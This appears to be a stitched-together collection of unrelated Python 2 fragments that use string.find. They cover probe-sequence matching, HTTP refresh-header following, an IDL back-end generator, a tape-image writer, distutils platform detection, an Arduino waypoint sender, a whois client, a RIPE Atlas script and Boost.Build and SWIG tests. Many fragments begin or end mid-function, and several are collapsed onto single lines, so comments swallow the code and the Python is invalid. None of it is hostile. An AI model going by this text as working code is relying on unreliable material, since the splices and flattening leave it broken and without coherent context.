                    esd = exon_sequence_database[(gene, exon_num)]
                    exon_seq = esd.ExonSeq()
                    strand = esd.Strand()
                    junction_seq.append(exon_seq)
                    y += 1
                    #exon_data = string.join([gene+':'+exon_num,probeset_comp_list,exon_seq],'\t')+'\n'
                    #data.write(exon_data)
                except KeyError:
                    null = []
            #if 'E5' in probeset_exon_db[(probeset,gene)]:
            if y > 0:
                if strand == '-':
                    junction_seq.reverse()
                junction_seq_str = string.join(junction_seq, '')
                junction_seq_str = string.upper(junction_seq_str)
                not_found = 0
                for probeset_seq in probeset_seq_list:
                    #probeset_seq = reverse_string(probeset_seq)
                    probeset_seq_rev = reverse_orientation(probeset_seq)
                    if probeset_seq in junction_seq_str:
                        f = string.find(junction_seq_str, probeset_seq)
                        positions.append((f, len(probeset_seq)))
                        k += 1
                    else:
                        not_found = 1
                        x += 1
                if not_found == 1:
                    new_probeset_seq = probeset_seq_list[0]  ### pick the first probe sequence found
                    if len(positions) > 0:
                        positions.sort()
                        new_probeset_seq = junction_seq_str[positions[0][0]:positions[-1][0] + positions[-1][1]]
                        #print new_probeset_seq,positions, probeset,probeset_exon_db[(probeset,gene)],probeset_seq_list,junction_seq;kill
                junction_seq = string.join(junction_seq, '|')  ### indicate where the junction is
                probe_seq_data = string.join([probeset, new_probeset_seq, junction_seq], '\t') + '\n'
                data.write(probe_seq_data)
        except KeyError:
            null = []
    data.close()
    print k, x
def http_response(self, request, response):
    """
    Inspect the http response from urllib2 and see if there is a refresh
    response header. If there is, then attempt to follow it and re-execute
    the query using the new host.
    :param request:
    :param response:
    :return:
    """
    # extract the original response code and headers
    response_code = response.code

    # unless we got back a 200 don't do any further processing
    if response_code != 200:
        return response

    # attempt to parse and follow the refresh header if it exists
    try:
        response_headers = response.info()
        refresh_header = None
        for response_header_key in response_headers.keys():
            if response_header_key.lower() == REFRESH_HEADER.lower():
                refresh_header = response_headers.getheader(response_header_key)
                break

        if refresh_header is None:
            return response

        # at this point the header should resemble
        # Refresh: 3; url=http://c6403.ambari.apache.org:8088/
        semicolon_index = string.find(refresh_header, ';')

        # slice the redirect URL out of
        # 3; url=http://c6403.ambari.apache.org:8088/jmx
        if semicolon_index >= 0:
            redirect_url_key_value_pair = refresh_header[semicolon_index + 1:]
        else:
            redirect_url_key_value_pair = refresh_header

        equals_index = string.find(redirect_url_key_value_pair, '=')
        key = redirect_url_key_value_pair[:equals_index]
        redirect_url = redirect_url_key_value_pair[equals_index + 1:]

        if key.strip().lower() != REFRESH_HEADER_URL_KEY:
            logger.warning("Unable to parse refresh header {0}".format(refresh_header))
            return response

        # extract out just host:port
        # c6403.ambari.apache.org:8088
        redirect_netloc = urlparse(redirect_url).netloc

        # deconstruct the original request URL into parts
        original_url_parts = urlparse(request.get_full_url())

        # build a brand new URL by swapping out the original request URL's
        # netloc with the redirect's netloc
        redirect_url = urlunparse(ParseResult(original_url_parts.scheme,
            redirect_netloc, original_url_parts.path,
            original_url_parts.params, original_url_parts.query,
            original_url_parts.fragment))

        # follow the new URL and return the response
        return self.parent.open(redirect_url)
    except Exception, exception:
        logger.error("Unable to follow refresh header {0}. {1}".format(
            refresh_header, str(exception)))

    # fall back to the original response if the redirect could not be followed
    return response
def setupbe(args):
    # the list of classes in the back end
    clar = ['Interface', 'Operation', 'Type', 'Predefined', 'Alias',
            'Enumeration', 'Record', 'RecordMember', 'Choice', 'ChoiceElement',
            'Array', 'Sequence', 'BitSet', 'ByteSequence', 'ByteArray', 'Set',
            'Ref', 'InterfaceRef', 'Import', 'Exception', 'Parameter', 'Result']

    clinherit = {}
    for cl in clar:
        clinherit[cl] = []

    genlist = []
    for be in args:
        loc = string.find(be, '[')
        if loc == -1:
            list = ['default']
            name = be
        else:
            name = be[:loc]
            params = be[loc + 1:-1]
            list = string.split(params, ',')
        genlist.append((name, list))

    golist = []
    for (arg, list) in genlist:
        impname = 'gen' + arg
        exec 'import ' + impname
        for cl in clar:
            gotit = 0
            try:
                subcl = eval(impname + '.' + cl)
                gotit = 1
            except:
                pass
            if gotit:
                clinherit[cl].append(impname + '.' + cl)
                #print 'Registered '+impname+'.'+cl+'('+`subcl`+')'
        golist.append((eval(impname + '.Go'), list, arg, list))

    classtable = {}
    classtable['golist'] = golist

    for cl in clar:
        if len(clinherit[cl]) == 0:
            l = 'BE.' + cl
        else:
            l = ''
            for interface in clinherit[cl]:
                l = l + interface
                if interface != clinherit[cl][-1]:
                    l = l + ','
        str = 'class ' + cl + '(' + l + ')' + ': pass'
        exec str
        classtable[cl] = eval(cl)

    predef = [('octet', 'uint8_t'), ('short_cardinal', 'uint16_t'),
              ('cardinal', 'uint32_t'), ('long_cardinal', 'uint64_t'),
              ('char', 'int8_t'), ('short_integer', 'int16_t'),
              ('integer', 'int32_t'), ('long_integer', 'int64_t'),
              ('real', 'float32_t'), ('long_real', 'float64_t'),
              ('boolean', 'bool_t'), ('string', 'string_t'),
              ('dangerous_word', 'word_t'), ('dangerous_address', 'addr_t')]

    basictypesdict = {}
    count = 1
    for (middlname, cname) in predef:
        instance = classtable['Type']().predef(count, cname, classtable['Predefined']())
        basictypesdict[middlname] = instance
        count = count + 1
    classtable['builtin'] = basictypesdict

    return classtable
def create_chunks(file_names):
    """Traverse the list of filenames to insert, reading the relevant
    information, creating suitable chunks, and inserting them into
    the list of chunks."""

    new_chunks = []

    for name in file_names:
        # Find the .inf file and read the details stored within
        try:
            details = open(name + suffix + 'inf', 'r').readline()
        except IOError:
            try:
                details = open(name + suffix + 'INF', 'r').readline()
            except IOError:
                print("Couldn't open information file, %s" % (name + suffix + 'inf'))
                sys.exit()

        # Parse the details
        details = [string.rstrip(details)]

        splitters = [' ', '\011']

        # Split the details up where certain whitespace characters occur
        for s in splitters:
            new_details = []
            # Split up each substring (list entry)
            for d in details:
                new_details = new_details + string.split(d, s)
            details = new_details

        # We should have details about the load and execution addresses

        # Open the file
        try:
            in_file = open(name, 'rb')
        except IOError:
            print("Couldn't open file, %s" % name)
            sys.exit()

        # Find the length of the file (don't rely on the .inf file)
        in_file.seek(0, 2)
        length = in_file.tell()
        in_file.seek(0, 0)

        # Examine the name entry and take the load and execution addresses
        dot_at = string.find(details[0], '.')
        if dot_at != -1:
            real_name = details[0][dot_at+1:]
            load, exe = details[1], details[2]
        else:
            real_name = get_leafname(name)
            load, exe = details[0], details[1]

        load = hex2num(load)
        exe = hex2num(exe)

        if load == None or exe == None:
            print('Problem with %s: information is possibly incorrect.' % (name + suffix + 'inf'))
            sys.exit()

        # Reset the block number to zero
        block_number = 0

        # Long gap
        gap = 1

        # Write block details
        while True:
            block, last = write_block(in_file, real_name, load, exe, length, block_number)

            if gap == 1:
                new_chunks.append((0x110, number(2, 0x05dc)))
                gap = 0
            else:
                new_chunks.append((0x110, number(2, 0x0258)))

            # Write the block to the list of new chunks
            # For old versions, just write the block
            if UEF_major == 0 and UEF_minor < 9:
                new_chunks.append((0x100, block))
            else:
                new_chunks.append((0x100, block))

            if last == 1:
                break

            # Increment the block number
            block_number = block_number + 1

        # Close the input file
        in_file.close()

    # Write some finishing bytes to the list of new chunks
    # new_chunks.append((0x110, number(2,0x0258)))
    # new_chunks.append((0x112, number(2,0x0258)))

    # Return the list of new chunks
    return new_chunks
    shobj_suffix = '.obj'
    shobj_prefix = ''
    lib_prefix = ''
    lib_suffix = '.lib'
    dll_prefix = ''
    dll_suffix = '.dll'
elif sys.platform == 'cygwin':
    exe_suffix = '.exe'
    obj_suffix = '.o'
    shobj_suffix = '.os'
    shobj_prefix = ''
    lib_prefix = 'lib'
    lib_suffix = '.a'
    dll_prefix = ''
    dll_suffix = '.dll'
elif string.find(sys.platform, 'irix') != -1:
    exe_suffix = ''
    obj_suffix = '.o'
    shobj_suffix = '.o'
    shobj_prefix = ''
    lib_prefix = 'lib'
    lib_suffix = '.a'
    dll_prefix = 'lib'
    dll_suffix = '.so'
elif string.find(sys.platform, 'darwin') != -1:
    exe_suffix = ''
    obj_suffix = '.o'
    shobj_suffix = '.os'
    shobj_prefix = ''
    lib_prefix = 'lib'
    lib_suffix = '.a'
        # But we do this only once, and it is fast enough
        f = open(fn)
        try:
            s = f.read()
        finally:
            f.close()
    except IOError, exc:
        # if we can't read this file, we cannot say it is wrong
        # the compiler will complain later about this file as missing
        return (CONFIG_H_UNCERTAIN,
                "couldn't read '%s': %s" % (fn, exc.strerror))
    else:
        # "pyconfig.h" contains an "#ifdef __GNUC__" or something similar
        if string.find(s, "__GNUC__") >= 0:
            return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn)
        else:
            return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn)

def get_versions():
    """ Try to find out the versions of gcc, ld and dllwrap.
        If not possible it returns None for it.
    """
    from distutils.version import LooseVersion
    from distutils.spawn import find_executable
    import re

    gcc_exe = find_executable('gcc')
    if gcc_exe:
print "Received start from Arduino" waypointNum = 0 # open the file for reading infile = open("geocaching.loc", "r") # if the line starts with <coord then pull out the numbers # example: <coord lat="40.005717" lon="-79.598867"/> # send the numbers to the arduino line = infile.readline().strip('\n\r') while line: line = infile.readline().strip('\n\r') if line[0:7] == "<coord ": startPos = string.find(line, '\"') + 1 endPos = string.find(line, '\"', startPos + 1) lat = float(line[startPos:endPos]) startPos2 = string.find(line, '\"', endPos + 1) + 1 endPos2 = string.find(line, '\"', startPos2 + 1) lon = float(line[startPos2:endPos2]) connection.write(str(waypointNum)) connection.write("=" + str(round(lat, 6)) + "," + str(round(lon, 6)) + '\n') waypointNum = waypointNum + 1 inChar = connection.read() if inChar != 'A': print "Ack missing?" # Close opened file infile.close()
def mkMsg(self):
    """create and write module level message for this class.
    Most of this is just compiling the info. meta in a dictionary
    of lists where each list is a list of tuples describing the
    tag lines for the particular section of the message. This
    tuple format conforms to that used by the xmlMessage class
    which is modeled on basic python argument passing, i.e.
    (key,*value,**attr).
    """
    self.meta = {}
    self.meta['module'] = []
    self.meta['meta'] = []
    self.meta['input'] = []
    self.meta['output'] = []
    self.meta['errorlist'] = []

    self.meta['module'].append(('module', 'name='+self.modName, 'version='+__version__, 'dataset='+self.obsName))
    #instname = string.split(string.split(str(self))[0], '.')[1]
    self.meta['module'].append(('root', self.root))
    #self.meta['module'].append(('instance', instname))
    self.meta['meta'].append(('meta',))
    self.meta['meta'].append(('depend',))
    self.meta['meta'].append(('pkg',))
    self.meta['meta'].append(('name', 'python'))
    self.meta['meta'].append(('version', pyversion.split()[0]))
    self.meta['meta'].append(('pkg',))
    self.meta['meta'].append(('name', 'bpz'))
    bpzVersion = self._getBpzVersion()
    self.meta['meta'].append(('version', bpzVersion))

    if self.errorList:
        self.meta['errorlist'].append(('errorlist',))
        for pkg, err in self.errorList:
            self.meta['errorlist'].append(('erroritem', err, 'frompkg='+pkg))

    # input section
    self.meta['input'].append(('input',))
    for f in self.inputList:
        if string.find(f, ".xml") != -1:
            self.meta['input'].append(('file', 'type=text/xml'))
            self.meta['input'].append(('name', os.path.join("Catalogs", f)))
        else:
            self.meta['input'].append(('file', 'type=text/ascii'))
            self.meta['input'].append(('name', os.path.join("Catalogs", f)))

    # output section
    if self.outputList:
        self.meta['output'].append(('output',))
        for f in self.outputList.keys():
            if string.find(f, ".xml") != -1:
                self.meta['output'].append(('file', 'type=text/xml'))
                self.meta['output'].append(('name', os.path.join("Catalogs", f)))
                for pred in self.outputList[f]:
                    self.meta['output'].append(('predecessor', os.path.join("Catalogs", pred)))
            else:
                self.meta['output'].append(('file', 'type=text/ascii'))
                self.meta['output'].append(('name', os.path.join("Catalogs", f)))
                for pred in self.outputList[f]:
                    self.meta['output'].append(('predecessor', os.path.join("Catalogs", pred)))

    # pass this dictionary to the class pMessage...
    msgFile = os.path.join(self.messagedir, self.modName+"_module.xml")
    mmsg = pMessage(self.meta)
    mmsg.writeMsg(msgFile)
    return
def get_platform():
    """Return a string that identifies the current platform.  This is used
    mainly to distinguish platform-specific build directories and
    platform-specific built distributions.  Typically includes the OS name
    and version and the architecture (as supplied by 'os.uname()'),
    although the exact information included depends on the OS; eg. for IRIX
    the architecture isn't particularly important (IRIX only runs on SGI
    hardware), but for Linux the kernel version isn't particularly
    important.

    Examples of returned values:
       linux-i586
       linux-alpha (?)
       solaris-2.6-sun4u
       irix-5.3
       irix64-6.2

    Windows will return one of:
       win-amd64 (64bit Windows on AMD64 (aka x86_64, Intel64, EM64T, etc)
       win-ia64 (64bit Windows on Itanium)
       win32 (all others - specifically, sys.platform is returned)

    For other non-POSIX platforms, currently just returns 'sys.platform'.
    """
    if os.name == 'nt':
        # sniff sys.version for architecture.
        prefix = " bit ("
        i = string.find(sys.version, prefix)
        if i == -1:
            return sys.platform
        j = string.find(sys.version, ")", i)
        look = sys.version[i+len(prefix):j].lower()
        if look == 'amd64':
            return 'win-amd64'
        if look == 'itanium':
            return 'win-ia64'
        return sys.platform

    if os.name != "posix" or not hasattr(os, 'uname'):
        # XXX what about the architecture? NT is Intel or Alpha,
        # Mac OS is M68k or PPC, etc.
        return sys.platform

    # Try to distinguish various flavours of Unix
    (osname, host, release, version, machine) = os.uname()

    # Convert the OS name to lowercase, remove '/' characters
    # (to accommodate BSD/OS), and translate spaces (for "Power Macintosh")
    osname = string.lower(osname)
    osname = string.replace(osname, '/', '')
    machine = string.replace(machine, ' ', '_')
    machine = string.replace(machine, '/', '-')

    if osname[:5] == "linux":
        # At least on Linux/Intel, 'machine' is the processor --
        # i386, etc.
        # XXX what about Alpha, SPARC, etc?
        return "%s-%s" % (osname, machine)
    elif osname[:5] == "sunos":
        if release[0] >= "5":           # SunOS 5 == Solaris 2
            osname = "solaris"
            release = "%d.%s" % (int(release[0]) - 3, release[2:])
        # fall through to standard osname-release-machine representation
    elif osname[:4] == "irix":          # could be "irix64"!
        return "%s-%s" % (osname, release)
    elif osname[:3] == "aix":
        return "%s-%s.%s" % (osname, version, release)
    elif osname[:6] == "cygwin":
        osname = "cygwin"
        rel_re = re.compile(r'[\d.]+')
        m = rel_re.match(release)
        if m:
            release = m.group()
    elif osname[:6] == "darwin":
        #
        # For our purposes, we'll assume that the system version from
        # distutils' perspective is what MACOSX_DEPLOYMENT_TARGET is set
        # to.  This makes the compatibility story a bit more sane because
        # the machine is going to compile and link as if it were
        # MACOSX_DEPLOYMENT_TARGET.
        from distutils.sysconfig import get_config_vars
        cfgvars = get_config_vars()

        macver = os.environ.get('MACOSX_DEPLOYMENT_TARGET')
        if not macver:
            macver = cfgvars.get('MACOSX_DEPLOYMENT_TARGET')

        if 1:
            # Always calculate the release of the running machine,
            # needed to determine if we can build fat binaries or not.

            macrelease = macver
            # Get the system version. Reading this plist is a documented
            # way to get the system version (see the documentation for
            # the Gestalt Manager)
            try:
                f = open('/System/Library/CoreServices/SystemVersion.plist')
            except IOError:
                # We're on a plain darwin box, fall back to the default
                # behaviour.
                pass
            else:
                try:
                    m = re.search(
                            r'<key>ProductUserVisibleVersion</key>\s*' +
                            r'<string>(.*?)</string>', f.read())
                    if m is not None:
                        macrelease = '.'.join(m.group(1).split('.')[:2])
                    # else: fall back to the default behaviour
                finally:
                    f.close()

        if not macver:
            macver = macrelease

        if macver:
            from distutils.sysconfig import get_config_vars
            release = macver
            osname = "macosx"

            if (macrelease + '.') >= '10.4.' and \
                    '-arch' in get_config_vars().get('CFLAGS', '').strip():
                # The universal build will build fat binaries, but not on
                # systems before 10.4
                #
                # Try to detect 4-way universal builds, those have
                # machine-type 'universal' instead of 'fat'.

                machine = 'fat'
                cflags = get_config_vars().get('CFLAGS')

                archs = re.findall('-arch\s+(\S+)', cflags)
                archs = tuple(sorted(set(archs)))

                if len(archs) == 1:
                    machine = archs[0]
                elif archs == ('i386', 'ppc'):
                    machine = 'fat'
                elif archs == ('i386', 'x86_64'):
                    machine = 'intel'
                elif archs == ('i386', 'ppc', 'x86_64'):
                    machine = 'fat3'
                elif archs == ('ppc64', 'x86_64'):
                    machine = 'fat64'
                elif archs == ('i386', 'ppc', 'ppc64', 'x86_64'):
                    machine = 'universal'
                else:
                    raise ValueError(
                        "Don't know machine value for archs=%r" % (archs,))

            elif machine == 'i386':
                # On OSX the machine type returned by uname is always the
                # 32-bit variant, even if the executable architecture is
                # the 64-bit variant
                if sys.maxint >= 2**32:
                    machine = 'x86_64'

            elif machine in ('PowerPC', 'Power_Macintosh'):
                # Pick a sane name for the PPC architecture.
                machine = 'ppc'

                # See 'i386' case
                if sys.maxint >= 2**32:
                    machine = 'ppc64'

    return "%s-%s-%s" % (osname, release, machine)
dir = os.getcwd()
filelist = dirEntries(dir, True, 'py')

search_file = 'Mayavi_PhaseIso.py'
length = len(search_file)

for file0 in filelist:
    file_len = len(file0)
    thing = file0[file_len - length:file_len]
    check = (thing == search_file)
    if string.find(file0, search_file) != -1:
        print file0
        cdir = file0[0:len(file0) - length]
        print cdir
        #
        s2 = "os.listdir('" + cdir + "'):"
        s3 = "os.listdir('.'):"
        #
        replaceAll(file0, s3, s2)
        #
        #
        s6 = "dir=os.getcwd()"
        s7 = "dir='" + cdir + "'"
        replaceAll(file0, s6, s7)
            jobStuff['stdout'] = os.path.join(scriptOut, os.path.basename(script)) + '.o' + str(jobStuff['number'])
            jobStuff['stderr'] = os.path.join(scriptErr, os.path.basename(script)) + '.e' + str(jobStuff['number'])
            jobStuff['command'] = command
            jobStuff['type'] = 'proc2'
            jobStuff['message'] = val
            jobStuff['date'] = str(datetime.datetime.now())
            doc['batchJob'].append(jobStuff)
            proc = {}
            proc['batchjob'] = jobStuff['number']
            doc['proc2'] = proc
            db.save_doc(doc)

if __name__ == '__main__':
    myargs = []
    mykwargs = {}
    for arg in sys.argv[1:]:
        if string.find(arg, '=') == -1:
            myargs.append(arg)
        else:
            mykwargs[arg.split('=')[0]] = arg.split('=')[1]
    main(*myargs, **mykwargs)
def parse_methods(self, vtk_obj):
    "Parse for the methods."
    debug("VtkPrintMethodParser:: parse_methods()")
    if self._initialize_methods(vtk_obj):
        # if David Gobbi's improvements are in this version of VTK
        # then I need to go no further.
        return

    for method in self.methods[:]:
        # removing methods that have nothing to the right of the ':'
        if (method[1] == '') or \
           (string.find(method[1], "none") > -1):
            self.methods.remove(method)

    for method in self.methods:
        # toggle methods are first identified
        if (method[1] == "On") or (method[1] == "Off"):
            try:
                val = eval("vtk_obj.Get%s ()" % method[0])
                if val == 1:
                    eval("vtk_obj.%sOn ()" % method[0])
                elif val == 0:
                    eval("vtk_obj.%sOff ()" % method[0])
            except AttributeError:
                pass
            else:
                self.toggle_meths.append(method[0] + "On")
        else:
            # see if it is get_set or get or a state method
            found = 0
            # checking if it is a state func.
            # figure out the long names from the dir_state_meths
            for sms in self.dir_state_meths[:]:
                if string.find(sms[0], method[0]) >= 0:
                    self.state_meths.append(sms)
                    self.dir_state_meths.remove(sms)
                    found = 1
            if found:
                self.get_meths.append("Get" + method[0])
                try:
                    t = eval("vtk_obj.Get%sAsString ()" % method[0])
                except AttributeError:
                    pass
                else:
                    self.get_meths.append("Get" + method[0] + "AsString")
            else:
                # the long name is inherited or it is not a state method
                try:
                    t = eval("vtk_obj.Get%s ().GetClassName ()" % method[0])
                except AttributeError:
                    pass
                else:
                    continue
                val = 0
                try:
                    val = eval("vtk_obj.Get%s ()" % method[0])
                except (TypeError, AttributeError):
                    pass
                else:
                    try:
                        f = eval("vtk_obj.Set%s" % method[0])
                    except AttributeError:
                        self.get_meths.append("Get" + method[0])
                    else:
                        try:
                            apply(f, val)
                        except TypeError:
                            try:
                                apply(f, (val, ))
                            except TypeError:
                                self.get_meths.append("Get" + method[0])
                            else:
                                self.get_set_meths.append(method[0])
                        else:
                            self.get_set_meths.append(method[0])

    self._clean_up_methods(vtk_obj)
"jamfile.jam", """ exe a : a_empty.cpp : <variant>debug <define>FOO <include>BAR ; exe a : a.cpp : <variant>release ; """) t.rm("bin/$toolset/release/a.exe") t.run_build_system("release define=FOO") t.expect_addition("bin/$toolset/release/a.exe") # Test that ambiguity is reported correctly. t.write("jamfile.jam", """ exe a : a_empty.cpp ; exe a : a.cpp ; """) t.run_build_system("--no-error-backtrace", status=None) t.fail_test(string.find(t.stdout(), "No best alternative") == -1) # Another ambiguity test: two matches properties in one alternative are neither # better nor worse than a single one in another alternative. t.write( "jamfile.jam", """ exe a : a_empty.cpp : <optimization>off <profiling>off ; exe a : a.cpp : <debug-symbols>on ; """) t.run_build_system("--no-error-backtrace", status=None) t.fail_test(string.find(t.stdout(), "No best alternative") == -1) # Test that we can have alternative without sources. t.write( "jamfile.jam", """
class WhoisRecord:

    defaultserver = 'whois.verisign-grs.net'  # 'whois.networksolutions.com'

    whoismap = {
        'com' : 'whois.internic.net',
        'org' : 'whois.pir.org',
        'net' : 'whois.internic.net',
        'edu' : 'whois.networksolutions.com',
        'biz' : 'whois.biz',
        'info': 'whois.afilias.info',
        'us'  : 'whois.nic.us',
        'de'  : 'whois.denic.de',
        'gov' : 'whois.nic.gov',
        'name': 'whois.nic.name',
        #??? 'pro': 'whois.nic.name',
        'museum': 'whois.museum',
        'int' : 'whois.iana.org',
        'aero': 'whois.information.aero',
        'coop': 'whois.nic.coop',
        # See http://www.nic.gov/cgi-bin/whois
        'mil' : 'whois.nic.mil',
        # See http://www.nic.mil/cgi-bin/whois
        'ca'  : 'whois.cdnnet.ca',
        'uk'  : 'whois.nic.uk',
        'au'  : 'whois.aunic.net',
        'hu'  : 'whois.nic.hu',
        # All the following are unverified/checked.
        'be'  : 'whois.ripe.net',
        'it'  : 'whois.ripe.net',    # also whois.nic.it
        'at'  : 'whois.ripe.net',    # also www.nic.at, whois.aco.net
        'dk'  : 'whois.ripe.net',
        'fo'  : 'whois.ripe.net',
        'lt'  : 'whois.ripe.net',
        'no'  : 'whois.ripe.net',
        'sj'  : 'whois.ripe.net',
        'sk'  : 'whois.ripe.net',
        'tr'  : 'whois.ripe.net',    # also whois.metu.edu.tr
        'il'  : 'whois.ripe.net',
        'bv'  : 'whois.ripe.net',
        'se'  : 'whois.nic-se.se',
        'br'  : 'whois.nic.br',      # a.k.a. whois.fapesp.br?
        'fr'  : 'whois.nic.fr',
        'sg'  : 'whois.nic.net.sg',
        'hm'  : 'whois.registry.hm', # see also whois.nic.hm
        'nz'  : 'domainz.waikato.ac.nz',
        'nl'  : 'whois.domain-registry.nl',
        # RIPE also handles other countries
        # See http://www.ripe.net/info/ncc/rir-areas.html
        'ru'  : 'whois.ripn.net',
        'ch'  : 'whois.nic.ch',      # see http://www.nic.ch/whois_readme.html
        'jp'  : 'whois.nic.ad.jp',   # (use DOM foo.jp/e for english; need to lookup !handles separately)
        'to'  : 'whois.tonic.to',
        'nu'  : 'whois.nic.nu',
        'fm'  : 'www.dot.fm',        # http request http://www.dot.fm/search.html
        'am'  : 'whois.nic.am',
        'nu'  : 'www.nunames.nu',    # http request
        # e.g. http://www.nunames.nu/cgi-bin/drill.cfm?domainname=nunames.nu
        #'cx' : 'whois.nic.cx',      # no response from this server
        'af'  : 'whois.nic.af',
        'as'  : 'whois.nic.as',
        'li'  : 'whois.nic.li',
        'lk'  : 'whois.nic.lk',
        'mx'  : 'whois.nic.mx',
        'pw'  : 'whois.nic.pw',
        'sh'  : 'whois.nic.sh',      # consistently resets connection
        'tj'  : 'whois.nic.tj',
        'tm'  : 'whois.nic.tm',
        'pt'  : 'whois.dns.pt',
        'kr'  : 'whois.nic.or.kr',   # see also whois.krnic.net
        'kz'  : 'whois.nic.or.kr',   # see also whois.krnic.net
        'al'  : 'whois.ripe.net',
        'az'  : 'whois.ripe.net',
        'ba'  : 'whois.ripe.net',
        'bg'  : 'whois.ripe.net',
        'by'  : 'whois.ripe.net',
        'cy'  : 'whois.ripe.net',
        'cz'  : 'whois.ripe.net',
        'dz'  : 'whois.ripe.net',
        'ee'  : 'whois.ripe.net',
        'eg'  : 'whois.ripe.net',
        'es'  : 'whois.ripe.net',
        'fi'  : 'whois.ripe.net',
        'gr'  : 'whois.ripe.net',
        'hr'  : 'whois.ripe.net',
        'lu'  : 'whois.ripe.net',
        'lv'  : 'whois.ripe.net',
        'ma'  : 'whois.ripe.net',
        'md'  : 'whois.ripe.net',
        'mk'  : 'whois.ripe.net',
        'mt'  : 'whois.ripe.net',
        'pl'  : 'whois.ripe.net',
        'ro'  : 'whois.ripe.net',
        'si'  : 'whois.ripe.net',
        'sm'  : 'whois.ripe.net',
        'su'  : 'whois.ripe.net',
        'tn'  : 'whois.ripe.net',
        'ua'  : 'whois.ripe.net',
        'va'  : 'whois.ripe.net',
        'yu'  : 'whois.ripe.net',
        # unchecked
        'ac'  : 'whois.nic.ac',
        'cc'  : 'whois.nic.cc',
        #'cn' : 'whois.cnnic.cn',    # connection refused
        'gs'  : 'whois.adamsnames.tc',
        'hk'  : 'whois.apnic.net',
        #'ie' : 'whois.ucd.ie',      # connection refused
        #'is' : 'whois.isnet.is',    # connection refused
        #'mm' : 'whois.nic.mm',      # connection refused
        'ms'  : 'whois.adamsnames.tc',
        'my'  : 'whois.mynic.net',
        #'pe' : 'whois.rcp.net.pe',  # connection refused
        'st'  : 'whois.nic.st',
        'tc'  : 'whois.adamsnames.tc',
        'tf'  : 'whois.adamsnames.tc',
        'th'  : 'whois.thnic.net',
        'tw'  : 'whois.twnic.net',
        #'us' : 'whois.isi.edu',
        'vg'  : 'whois.adamsnames.tc',
        #'za' : 'whois.co.za'        # connection refused
        }

    def __init__(self, domain=None):
        self.domain = domain
        self.whoisserver = None
        self.page = None

    def whois(self, domain=None, server=None, cache=0):
        if domain is not None:
            self.domain = domain
        if server is not None:
            self.whoisserver = server

        if self.domain is None:
            print "No Domain"
            raise "No Domain"

        if self.whoisserver is None:
            self.chooseserver()

        if self.whoisserver is None:
            print "No Server"
            raise "No Server"

        if cache:
            fn = "%s.dom" % self.domain
            if os.path.exists(fn):
                return open(fn).read()

        self.page = self._whois()

        if cache:
            open(fn, "w").write(self.page)

    def chooseserver(self):
        try:
            toplevel = string.split(self.domain, ".")[-1]
            self.whoisserver = WhoisRecord.whoismap.get(toplevel)
            #print toplevel, "---", self.whoisserver
            if self.whoisserver == None:
                self.whoisserver = WhoisRecord.defaultserver
                return
        except:
            self.whoisserver = WhoisRecord.defaultserver
            return

        if toplevel in ('com', 'org', 'net'):
            tmp = self._whois()
            m = re.search("Whois Server:(.+)", tmp)
            if m:
                self.whoisserver = string.strip(m.group(1))
                #print "server 2:", self.whoisserver
                return
            self.whoisserver = 'whois.networksolutions.com'
            tmp = self._whois()
            m = re.search("Whois Server:(.+)", tmp)
            if m:
                self.whoisserver = string.strip(m.group(1))
                #print "server 1:", self.whoisserver
                return
        #print "server 3:", self.whoisserver

    def _whois(self):
        def alrmhandler(signum, frame):
            raise "TimedOut", "on connect"

        s = None
        ## try until we timeout
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if HAS_ALARM:
            s.setblocking(0)
            signal.signal(signal.SIGALRM, alrmhandler)
            signal.alarm(timeout)
        while 1:
            try:
                s.connect((self.whoisserver, 43))
            except socket.error, (ecode, reason):
                if ecode == errno.EINPROGRESS:
                    continue
                elif ecode == errno.EALREADY:
                    continue
                else:
                    raise socket.error, (ecode, reason)
                pass
            break
        if HAS_ALARM:
            signal.alarm(0)

        ret = select.select([s], [s], [], 30)
        if len(ret[1]) == 0 and len(ret[0]) == 0:
            s.close()
            raise TimedOut, "on data"
        s.setblocking(1)

        s.send("%s\n" % self.domain)

        page = ""
        while 1:
            data = s.recv(8196)
            if not data:
                break
            page = page + data
        s.close()

        if string.find(page, "No match for") != -1:
            raise 'NoSuchDomain', self.domain
        if string.find(page, "No entries found") != -1:
            raise 'NoSuchDomain', self.domain
        if string.find(page, "no domain specified") != -1:
            raise 'NoSuchDomain', self.domain
        if string.find(page, "NO MATCH:") != -1:
            raise 'NoSuchDomain', self.domain

        return page
    if area is not None or country is not None or asn is not None:
        usage("Specify country *or* area *or* ASn *or* old measurement")
        sys.exit(1)
    data["probes"][0]["requested"] = 1000  # Dummy value, anyway,
                                           # but necessary to get
                                           # all the probes
    # TODO: the huge value of "requested" makes us wait a very long time
    data["probes"][0]["type"] = "msm"
    data["probes"][0]["value"] = old_measurement
    data["definitions"][0]["description"] += (
        " from probes of measurement #%s" % old_measurement)
else:
    data["probes"][0]["type"] = "area"
    data["probes"][0]["value"] = "WW"

if string.find(target, ':') > -1:
    af = 6
else:
    af = 4
data["definitions"][0]['af'] = af

if measurement_id is None:
    if verbose:
        print data
    measurement = RIPEAtlas.Measurement(data)
    print "Measurement #%s %s uses %i probes" % (
        measurement.id, data["definitions"][0]["description"],
        measurement.num_probes)

    rdata = measurement.results(wait=True, percentage_required=percentage_required)
t.expect_addition("bin/$toolset/debug/main.exe") t.rm(["bin", "a/bin", "b/bin"]) # Test that putting a library in sources of a searched library works. t.write("jamfile.jam", """\ exe main : main.cpp png ; lib png : z : <name>png ; lib z : : <name>zzz ; """) t.run_build_system(["-a", "-d+2"], status=None, stderr=None) # Try to find the "zzz" string either in response file (for Windows compilers), # or in the standard output. rsp = t.adjust_names("bin/$toolset/debug/main.exe.rsp")[0] if os.path.exists(rsp) and (string.find(open(rsp).read(), "zzz") != -1): pass elif string.find(t.stdout(), "zzz") != -1: pass else: t.fail_test(1) # Test main -> libb -> liba chain in the case where liba is a file and not a # Boost.Build target. t.rm(".") t.write("jamroot.jam", "") t.write("a/jamfile.jam", """\ lib a : a.cpp ; install dist : a ; """)
import string

from template_typedef_cplx import *

#
# double case
#
try:
    d = make_Identity_double()
    a = d.this
except:
    # note: if the constructor itself raised, 'd' is unbound here, so the
    # original 'print d' would mask the real failure with a NameError
    print "make_Identity_double() did not return an instance"
    raise RuntimeError

s = string.split('%s' % d)[1]
if string.find(s, 'ArithUnaryFunction') == -1:
    print d, "is not an ArithUnaryFunction"
    raise RuntimeError

